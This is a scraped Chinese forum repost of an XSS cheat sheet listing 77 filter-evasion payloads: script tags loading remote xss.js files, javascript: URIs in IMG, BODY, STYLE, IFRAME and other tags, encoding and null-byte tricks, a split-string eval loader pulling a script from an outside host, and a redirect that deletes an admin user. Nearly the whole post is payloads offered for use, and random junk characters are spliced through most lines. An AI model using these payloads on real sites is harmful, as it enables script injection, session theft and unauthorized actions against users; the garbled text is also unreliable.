貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。# \, v% \. D3 W- V% b
(1)普通的XSS JavaScript注入/ T$ \$ o* V0 E5 z+ t9 ~
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
/ g7 H$ q# p& Y" y9 @5 t(2)IMG标签XSS使用JavaScript命令, k# e7 j. P. I8 x
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>" P) S; V" B5 @' Q
(3)IMG标签无分号无引号$ a' h6 [6 ^* q7 T
<IMG SRC=javascript:alert(‘XSS’)>
( d. u& N+ S+ A7 ^) E& [(4)IMG标签大小写不敏感
0 L# c& Q& H" l3 A1 e+ a ]- E$ z: i, C<IMG SRC=JaVaScRiPt:alert(‘XSS’)>' w s3 _$ x2 a7 Q9 T3 k& @
(5)HTML编码(必须有分号)' T; G" [9 O2 Y& f2 k, _% {
<IMG SRC=javascript:alert(“XSS”)>
% J2 D: @0 M: ~, }: A(6)修正缺陷IMG标签
7 w! W3 J& q$ y4 R) g) _<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>- G0 E8 A% M2 b( n0 }) e; q' N
; N/ M) D5 e. h+ F
d P2 u8 ^" x; ^7 `(7)formCharCode标签(计算器)
! d! ]9 ]& Q3 Z% e3 q4 ?<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>* z9 ?% T: N& r- a, s
(8)UTF-8的Unicode编码(计算器)+ m; G5 [; r2 O
<IMG SRC=jav..省略..S')>$ C0 f6 ^) ?- j+ O6 p
(9)7位的UTF-8的Unicode编码是没有分号的(计算器), |- s- C* w2 c T6 m3 t
<IMG SRC=jav..省略..S')>1 m- I0 g+ b! n- O3 N$ k7 |3 M
(10)十六进制编码也是没有分号(计算器)( `0 e' G% G/ ~0 ]/ R
<IMG SRC=java..省略..XSS')>; k. q7 Z, A' L8 q. d" ~
(11)嵌入式标签,将Javascript分开
& P# z6 l6 @% b1 C V; I<IMG SRC=”jav ascript:alert(‘XSS’);”>3 U" H' q3 C8 x) d
(12)嵌入式编码标签,将Javascript分开
5 d+ N: P9 j% l8 s/ G( w8 }' F<IMG SRC=”jav ascript:alert(‘XSS’);”>
6 B ?8 e9 J0 ?+ M(13)嵌入式换行符2 A: O7 O/ m, W8 h
<IMG SRC=”jav ascript:alert(‘XSS’);”>; ^1 l. Z4 V3 P
(14)嵌入式回车
4 {4 W+ G4 W" j. H) x9 w<IMG SRC=”jav ascript:alert(‘XSS’);”>
% N% u @2 X1 k, [$ L(15)嵌入式多行注入JavaScript,这是XSS极端的例子
- E; `* G7 c, Q3 v' ^. ]: k<IMG SRC=”javascript:alert(‘XSS‘)”>
/ I6 w3 |" _( K(16)解决限制字符(要求同页面)' j0 D" }$ h9 X# z0 K- C! r
<script>z=’document.’</script>: B6 |- ~+ K" E6 V
<script>z=z+’write(“‘</script>
( H& H# y0 _$ r, B" W<script>z=z+’<script’</script>
' ]* e, Q3 {% u7 V<script>z=z+’ src=ht’</script>
5 o4 @) Q# @" B% l9 O<script>z=z+’tp://ww’</script># U7 E" M3 C# M* s1 A. t: o
<script>z=z+’w.shell’</script>
! ], ^( \& F% e7 A<script>z=z+’.net/1.’</script>6 i g6 c; O& o/ B9 ?$ s
<script>z=z+’js></sc’</script>7 n; s; r7 ]1 Y/ Z |# ]' {& u
<script>z=z+’ript>”)’</script>
" n! b, j2 l: \- F1 T2 _2 {<script>eval_r(z)</script>
4 r0 x- b6 @8 a' A$ {/ v' O(17)空字符12-7-1 T00LS - Powered by Discuz! Board
# H* }" p# J1 p+ Uhttps://www.t00ls.net/viewthread ... table&tid=15267 2/64 n1 b$ q" {6 l; r2 Y, w# {. x
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out$ v2 Z. L& u* S0 V0 C- F
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
+ I5 k W( N$ H0 i7 Xperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out1 G% K% y* d, _8 s. u* F. g0 t: B
(19)Spaces和meta前的IMG标签0 y! W1 Z' f6 r* `: v
<IMG SRC=” javascript:alert(‘XSS’);”>
& n4 D- O) z* I. u6 G) t) \3 S(20)Non-alpha-non-digit XSS, ^: j7 }" E& |, o
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>$ ~; I4 _2 A$ H# F, w
(21)Non-alpha-non-digit XSS to 2" [# ?" o% v! k' h& k: F
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
& o2 L$ a! h/ H3 B(22)Non-alpha-non-digit XSS to 3
2 m* y8 \) X$ z7 {8 F7 O<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
8 s+ ^3 T$ e" q(23)双开括号4 J6 k2 x8 z# f% e! N) o! t1 F9 l
<<SCRIPT>alert(“XSS”);//<</SCRIPT>3 e6 i* k5 U, g
(24)无结束脚本标记(仅火狐等浏览器)2 a* I/ c9 e. Z* ]& `# ?( _) o
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>9 c3 w) ^ n" N( ^0 t
(25)无结束脚本标记2
( T4 b2 I/ |9 X' p+ ~! C# L7 n1 X<SCRIPT SRC=//3w.org/XSS/xss.js>+ O. i0 A; i- C+ q$ B* A- ^' A) e
(26)半开的HTML/JavaScript XSS+ F+ x; e% y- r6 E
<IMG SRC=”javascript:alert(‘XSS’)”
* [* T2 I, S6 x5 T# |* ]9 O( k(27)双开角括号! I* o1 z$ _" L, H5 t- N: i
<iframe src=http://3w.org/XSS.html <- S/ N1 v2 J; J9 F$ B
(28)无单引号 双引号 分号' q7 L0 C- S: Y6 J+ [
<SCRIPT>a=/XSS/
! t) O5 r F. T7 h0 K1 U; J$ Galert(a.source)</SCRIPT>
' y+ m8 d4 ~7 g: o( o(29)换码过滤的JavaScript Q! t9 Z+ S4 H, M% ~5 \
\”;alert(‘XSS’);//
$ q/ U: D" \7 J1 c% K4 F(30)结束Title标签! k5 F, G! m3 @5 E
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>" U; S. Y! D8 w) G8 c
(31)Input Image
8 M& J. `* C9 w/ B& q$ p<INPUT SRC=”javascript:alert(‘XSS’);”>: B' u; ?/ \9 y( z/ C+ ?2 t2 a
(32)BODY Image" T0 k$ v$ e: Z4 j* k( [% H
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
* W9 ^9 R* R, V/ I& Y3 L9 O(33)BODY标签9 j' J& N ]( b2 d' g! N
<BODY(‘XSS’)>
Z: w% T: k5 g6 p! z& w(34)IMG Dynsrc
1 t. s8 D3 w! x* M" O<IMG DYNSRC=”javascript:alert(‘XSS’)”>
% H& A/ h8 C9 F" ~; m2 `(35)IMG Lowsrc
$ {7 X8 g* {! P' V* s- x<IMG LOWSRC=”javascript:alert(‘XSS’)”>
# j0 s3 n w/ s(36)BGSOUND7 G( f; u8 J0 l L; y, s ?
<BGSOUND SRC=”javascript:alert(‘XSS’);”>% m$ c% W+ K4 {% L8 r
(37)STYLE sheet
# [$ _) s( }; A. _( ~<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
, ` u, \* F; ~6 ^8 s4 y(38)远程样式表6 F+ [* U9 }* ?# B& A
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”># ~! g; _( T9 w8 P
(39)List-style-image(列表式)
6 g' ^1 p7 g" q2 I<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS7 A; y' m9 n# q/ E7 A7 o
(40)IMG VBscript' I/ o1 `& N: x, o: T' q5 o
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
- J) U1 u& t F0 O(41)META链接url+ T# E7 z [% t& {9 Z4 o3 d
Y) A) n7 d7 o2 k( c: [% [
, s" S' h( N- K) K<META HTTP-EQUIV=”refresh” CONTENT=”0;
2 I+ W, g6 V( D l. N, L* pURL=http://;URL=javascript:alert(‘XSS’);”>
; }/ t C: W/ `. V(42)Iframe0 c4 G6 @# B' O- x m
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
& K0 M" h5 Z9 s3 b3 {/ E+ o' ](43)Frame5 G h+ N; X2 J7 y- |
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board2 u2 O- S: Y; O' H& T4 o6 e. b$ e
https://www.t00ls.net/viewthread ... table&tid=15267 3/6
( r& u7 o6 X6 M1 q, ?% z(44)Table- p/ Q8 M3 J+ v j8 N% R1 }$ B# S9 }
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>9 U9 s0 v \6 a/ h3 m& w1 h
(45)TD# h0 @4 k! E; ]0 k% S6 ]
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”> ]6 K+ t8 K/ P* O* |9 _0 k
(46)DIV background-image
9 r# y& V N) c<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
. Y& I& _+ Z' |(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-/ }! }% O( S1 E3 ]# I @' y: y
8&13&12288&65279)
3 d. B% O+ o2 U- n7 M/ a$ \<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>, T, B% c) a# G" L2 Z& _
(48)DIV expression
6 g2 y) `9 @; N5 `5 s$ c<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
& `" {8 X+ h" p/ E, W7 j' R# _" k(49)STYLE属性分拆表达
( h9 [+ Q1 o5 ^5 |; R<IMG STYLE=”xss:expression_r(alert(‘XSS’))”># N: c/ c. @7 I+ b5 f
(50)匿名STYLE(组成:开角号和一个字母开头)
0 a5 R% C8 m" c( x$ j! Y$ A; q) K' g<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>$ y6 ?/ ^1 w, p" {5 V
(51)STYLE background-image
) {! m+ F6 B" s% f<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
9 i1 A/ Q/ X* D* oCLASS=XSS></A>2 @8 }" l* n4 R9 f
(52)IMG STYLE方式) H- I) l1 R1 U& ]% ?$ e
exppression(alert(“XSS”))’>
$ u! r8 [+ a3 O# S(53)STYLE background
+ U' [* f5 i3 x) S5 @<STYLE><STYLE2 A. l- q$ x3 i$ r2 D
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>) @0 v7 B/ B& T; \. a# m
(54)BASE) I: ]8 U6 [; D0 L! i
<BASE HREF=”javascript:alert(‘XSS’);//”>$ K. s& N( V; m; {/ o
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS# B0 J- @7 w+ B. @6 @) Q
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
/ F/ ~9 C" r8 B$ e, ](56)在flash中使用ActionScrpt可以混进你XSS的代码
3 ?, J) o! P$ n7 A( J3 i" S1 va=”get”;
8 w3 f/ Y) G0 s2 Y/ ~b=”URL(\”";
: C( J5 P0 n) m# d( F( |c=”javascript:”;
+ q: X. { N- v- N/ qd=”alert(‘XSS’);\”)”;- }; q. A% L6 K- o
eval_r(a+b+c+d);2 Z5 i" d; w- d; Q0 @
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上; F, v; Z3 M! G2 c2 K- ]1 \0 K/ l
<HTML xmlns:xss>! c, ?) N. a: r% n
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
2 H o5 R0 C2 N; z* g# S, u) {<xss:xss>XSS</xss:xss>: L# {5 d4 Q; _- O; J
</HTML>! V2 s* @, U) K1 N) W0 b
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用0 S; s( i, [. ~, o& d0 L
<SCRIPT SRC=””></SCRIPT>+ V9 g! D2 C2 s* b6 I
(59)IMG嵌入式命令,可执行任意命令
+ T: A6 W/ D9 i8 e; H- r7 p" P. k<IMG SRC=”http://www.XXX.com/a.php?a=b”>
: T* H3 f. L: r P2 j(60)IMG嵌入式命令(a.jpg在同服务器)
9 E1 X- f5 @ E, PRedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser; |' c3 V( ` ]$ p6 P+ r
(61)绕符号过滤& X( `' b* _% r
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
2 `8 k) u2 J4 q& M8 t5 X" K(62)
8 e- [) G+ T: ^1 W6 X<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>; _3 L+ i7 v! B# ]& w) H: B3 G, d
(63); M9 G! O( s! Q3 k5 u
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
+ o M2 G6 u2 e, G' G7 N) e2 w. E(64)) x0 e$ ?+ B6 C4 M
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
6 E$ b. @! @# L+ h) S(65)" |. S9 W* z% e& h8 l
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
0 _# h, r3 f' S3 U(66)12-7-1 T00LS - Powered by Discuz! Board
! p; {- @+ q5 s, K8 V+ B k1 \. Hhttps://www.t00ls.net/viewthread ... table&tid=15267 4/6
! t1 Y1 Y! n S# R, E: k; p<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
) f( A9 J# c8 j4 U6 P(67)
+ H+ y# N+ p8 a; F8 z. A% X- D<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>
7 c, L) _& ~- J9 z</SCRIPT>7 b ~+ e* H) d2 e. v0 M
(68)URL绕行- r5 c. t4 U4 o6 s
<A HREF=”http://127.0.0.1/”>XSS</A>
. s2 S3 O2 c5 a( P4 R: u2 ~(69)URL编码2 d7 f- }: G7 ^- }# ]% N b$ _
<A HREF=”http://3w.org”>XSS</A>
& O* F8 d" f& ]1 `8 l(70)IP十进制" Q7 a! f0 V! n2 C
<A HREF=”http://3232235521″>XSS</A>
4 Q4 ~( d( k; I; ?) \8 k(71)IP十六进制
a- h1 ?2 W. m7 k' d<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
* ~) }& y0 Y5 ^$ ?* U8 f$ {3 x(72)IP八进制
2 o. B1 j" y4 v2 w8 k* U) U<A HREF=”http://0300.0250.0000.0001″>XSS</A>4 l# }) N7 Q6 G Y8 l. p
(73)混合编码2 Z6 X5 f3 k8 `2 Q& L. W
<A HREF=”h
2 d9 i( n7 u# Z; v: Jtt p://6 6.000146.0×7.147/”">XSS</A>
0 {, A# O* t! i(74)节省[http:]" Z" k5 ?; y$ }
<A HREF=”//www.google.com/”>XSS</A>
6 H {8 X9 \" C0 O(75)节省[www]' b9 {: ?" F4 q+ s
<A HREF=”http://google.com/”>XSS</A>
" ~( e3 z8 j) g+ p F(76)绝对点绝对DNS& S4 D X9 z; E# p- {5 E
<A HREF=”http://www.google.com./”>XSS</A>
- F2 X* o. s( D% ?3 E(77)javascript链接
/ r& d' U' `2 X9 `: G8 l3 g<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
( T1 ?' X m* J4 n7 P
9 F# c+ i$ Z1 j* T/ ]7 h$ ]原文地址:http://fuzzexp.org/u/0day/?p=14
+ a9 i% J- L2 S7 b- |; V# x9 [* L4 T. @- l) J! }3 b' ?
|
发表于 2013-4-19 19:22:37
收藏
支持
反对